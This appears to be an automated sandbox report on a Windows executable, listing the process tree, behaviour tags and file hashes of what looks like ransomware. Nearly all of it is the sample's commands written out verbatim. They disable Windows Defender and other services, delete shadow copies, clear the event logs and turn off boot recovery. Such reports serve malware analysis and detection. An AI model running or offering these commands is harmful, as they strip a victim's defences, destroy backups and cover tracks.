sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe"C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1660
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:268
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1488
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:324
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:360
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:428
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1828
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1628
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:2040
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:992
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1360
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1748
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1324
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:844
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1728
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1132
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:916
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1708
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1576
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1216
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1040
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:668
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1488
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:816
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:852
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1860
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1872
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1808
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1688
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1668
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1868
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1308
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:568
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:988
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1936
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:960
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1608
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:460
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1496
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2028
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1676
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1828
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:732
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1048
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1740
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:596
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1508
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1916 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1600
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:528 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1416 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1596 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1736 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:656 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2032 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1220 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1540
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2056 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2088 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2164
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2184
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5f2bde13962b7bcce5d9fc35a61c054af
SHA128dbbccdda3c3c74cb63c01fd53bb625bdd7bb4f
SHA256834eea2f9f3e618c1bc50b3b934682f33269edb94c3f1aa5ad99e1708a40891b
SHA5126fd44341268f41157480941c1f5b75b0ce0742cfc63f6f8c9978bc22239b923918cc5ae7881ed099b3f8bcd201e935232a19a5e7c918cc499039bb4cbf383eeb